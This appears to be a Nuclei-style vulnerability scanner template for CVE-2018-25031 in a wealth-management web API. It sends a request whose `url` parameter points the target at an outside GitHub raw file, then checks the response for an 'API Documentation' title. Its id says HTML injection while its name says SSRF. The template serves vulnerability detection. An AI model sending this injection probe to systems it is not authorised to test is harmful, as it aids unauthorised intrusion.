id: cve-2018-25031-HTMLi

info:
  name: WealthManagementWeb SSRF Detection (CVE-2018-25031)
  author: Al-Muntadhar
  severity: low
  description: |
    SSRF in the Fiserv Api for WealthManagement Services.
  tags: ssrf, cve, cve2018, wealthmanagement

requests:
  - method: GET
    path:
      - "{{BaseURL}}/WealthManagementWeb/api/index.jsp?url=https://raw.githubusercontent.com/MMAKINGDOM/CVE-2018-25031/refs/heads/main/CVE-2018-25031.yaml"

    matchers:
      - type: word
        part: body
        words:
          - "<title>API Documentation</title>"
